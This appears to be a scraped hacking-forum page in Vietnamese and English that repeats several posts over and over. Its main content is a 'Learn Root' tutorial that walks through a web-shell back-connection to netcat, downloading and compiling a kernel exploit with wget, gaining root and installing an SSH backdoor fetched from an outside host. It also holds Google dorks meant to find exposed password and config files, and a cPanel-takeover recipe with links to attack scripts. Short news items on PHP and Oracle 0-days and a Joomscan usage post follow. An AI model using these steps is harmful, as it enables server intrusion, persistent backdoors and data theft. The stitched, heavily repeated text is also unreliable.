Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
READ MORE »
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
READ MORE »
CRLF Injection by Un_N0n Antil0g
Biography of Author
Gurender Singh A.K.A Un_N0n Antil0g is Learner and Independent IT security researcher , currently working with Team Indi HeX And ICP Helping new people in field of hacking and security. He is Admin of Team Indi HeX. And Admin of Indian Cyber Police with Nipun jaswal , Chetan Soni , COde InjectOr.
BRIEF INTRODUCTION
CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing of user entered data to the response header fields like (Location, Set-Cookie and ETC) without proper sanitations, which can result in various forms of security exploits. Security exploits range from XSS, Cache-Poisoning, Cache-based defacement, page injection and ETC.
Download the paper from Here
Google Hacking DataBase (GHDB)
Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.
(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login
site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files
allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.
Footholds
Examples of queries that can help a hacker gain a foothold into a web server(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login
Files containing usernames
These files contain usernames, but no passwords... Still, google finding usernames on a web site...site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files
Sensitive Directories
Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password
Google Hacking DataBase (GHDB)
Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.
(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login
site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files
allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.
Footholds
Examples of queries that can help a hacker gain a foothold into a web server(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login
Files containing usernames
These files contain usernames, but no passwords... Still, google finding usernames on a web site...site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files
Sensitive Directories
Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password
Cách chiếm cPanel 1 Server
Tải lên sy_conf.pl & htaccess và chmod cả 755
Tải lên B-F.php trong một thư mục khác nhau
Tải lên B-F.php trong một thư mục khác nhau
.htaccess
http://www.mediafire.com/?4pm551dxidq6zc2
Sy_Conf.pl
http://www.mediafire.com/?r4kkj92ij77r1sf
B-F.php
http://www.mediafire.com/?s58tulka2kmu1d7
Cách chiếm cPanel 1 Server
Tải lên sy_conf.pl & htaccess và chmod cả 755
Tải lên B-F.php trong một thư mục khác nhau
Tải lên B-F.php trong một thư mục khác nhau
.htaccess
http://www.mediafire.com/?4pm551dxidq6zc2
Sy_Conf.pl
http://www.mediafire.com/?r4kkj92ij77r1sf
B-F.php
http://www.mediafire.com/?s58tulka2kmu1d7
Learn Root - Totally Explaind
★☆★ With the Name of ALLAH, who gave me the Power of Knowledge ! ★☆★
Hey ABH, I am Kr4L BeN!M from security Leechers Team and i am going to teach you all about rooting linux boxes and linux knowledge that you must know if you are hacker :)
[Thanks to All Pakistani and Palestine Hackers ]

#So Lets Start...
These are Some Basic Questions asked by myself as a n00b :P
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting master admin privillages of Servers :)
Things you need
# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain
Simply you can seach on http://www.google.com for these, except BRAIN and SHELL :)
Getting Back Connection to the servers
Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"
ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....
Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.
now came back to netcat and type "nc -l -v -p 2121"
it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
Getting a Right exploit for the servers
Type : Uname -a & hit enter.
It'll look something like this:
Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com
Compiling & executing exploits
Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.
Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.
So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-
Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"
Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit
Next step is to execute it So we'll type: "./exploit"
here it'll show different process...
: #
: #
got root you m0f0 !! [<example]
Now it say got root. Let's Check is it true,
Type: "whoami"
then it will say "root"
like: uid=0(root) gid=0(root) groups=0(root)
type "su" to get full privilages !
Installing Backdoors
type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"
Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges. ;)
Methods to execute exploits written in other languages
C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------
Perl Exploits
---------------
perl exploit.pl
---------------
Python
------------------
python exploit.py
------------------
php
-----------------
php exploit.php
-----------------
zip
----------------
unzip exploit.zip
./run
----------------
All Questions are Welcome
Hey ABH, I am Kr4L BeN!M from security Leechers Team and i am going to teach you all about rooting linux boxes and linux knowledge that you must know if you are hacker :)
[Thanks to All Pakistani and Palestine Hackers ]
#So Lets Start...
These are Some Basic Questions asked by myself as a n00b :P
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting master admin privillages of Servers :)
Things you need
# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain
Simply you can seach on http://www.google.com for these, except BRAIN and SHELL :)
Getting Back Connection to the servers
Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"
ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....
Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.
now came back to netcat and type "nc -l -v -p 2121"
it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
Getting a Right exploit for the servers
Type : Uname -a & hit enter.
It'll look something like this:
Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com
Compiling & executing exploits
Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.
Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.
So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-
Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"
Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit
Next step is to execute it So we'll type: "./exploit"
here it'll show different process...
: #
: #
got root you m0f0 !! [<example]
Now it say got root. Let's Check is it true,
Type: "whoami"
then it will say "root"
like: uid=0(root) gid=0(root) groups=0(root)
type "su" to get full privilages !
Installing Backdoors
type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"
Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges. ;)
Methods to execute exploits written in other languages
C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------
Perl Exploits
---------------
perl exploit.pl
---------------
Python
------------------
python exploit.py
------------------
php
-----------------
php exploit.php
-----------------
zip
----------------
unzip exploit.zip
./run
----------------
All Questions are Welcome
Kr4L From Team Security Leechers @ ABH
This tut is made by me, Please dont Post anywhere !
Just fo Education Purpose !!
This tut is made by me, Please dont Post anywhere !
Just fo Education Purpose !!
Knowledge and practice are twins,
and both go together.
There is no knowledge without practice,
and no practice without knowledge.
and both go together.
There is no knowledge without practice,
and no practice without knowledge.
Xuất hiện mã khai thác từ xa lỗi 0-day mới của PHP 5.4.3 trên Windows
Vào hôm qua 18/05, một thành viên có nickname là 0in đã gửi lên trang packetstormsecurity.org một mã khai thác từ xa (remote exploit) lợi dụng lỗ hổng trong hàm com_print_typeinfo của PHP phiên bản 5.4.3 dành cho nền tảng Windows.
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.
Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:
• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.
(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851
Nguồn: http://www.hvaonline.../list/42355.hva
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.
Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:
• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.
(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851
Nguồn: http://www.hvaonline.../list/42355.hva
[Tool] Joomscan Security Scanner - Update 611 lỗ hổng của Joomla
Hi All,
Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.
Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.
Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.
Có thể update thông qua command-line (terminal) bằng lệnh :
Cú pháp sử dụng khá đơn giản :
VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl
_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz
Các bạn có thể download source về để optimize và bỏ vào toolbox.
Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.
Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.
Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.
Có thể update thông qua command-line (terminal) bằng lệnh :
./joomscan.pl update
Cú pháp sử dụng khá đơn giản :
VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl
_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz
Các bạn có thể download source về để optimize và bỏ vào toolbox.
Lỗi 0-day 4 năm tuổi của Oracle vẫn chưa được vá
Mã khai thác lỗi 0-day 4 năm tuổi của Oracle Database đặt người dùng vào tình thế rất nguy hại!
Nguồn: http://www.hvaonline.../list/42263.hva
Nguồn: http://www.hvaonline.../list/42263.hva
Ngày 30/04 vừa qua, Oracle đã đưa ra thông báo đặc biệt hướng dẫn các cách khắc phục tạm thời (work-around) về lỗi bảo mật CVE-2012-1675 hay còn gọi là lỗi TNS Listener Poison Attack. Đây là một lỗi bảo mật cực kì nghiêm trọng cho phép các hacker có thể can thiệp từ xa vào luồng dữ liệu trao đổi giữa client và các máy chủ cơ sở dữ liệu Oracle mà không cần đến bất kì một cơ chế xác thực nào.
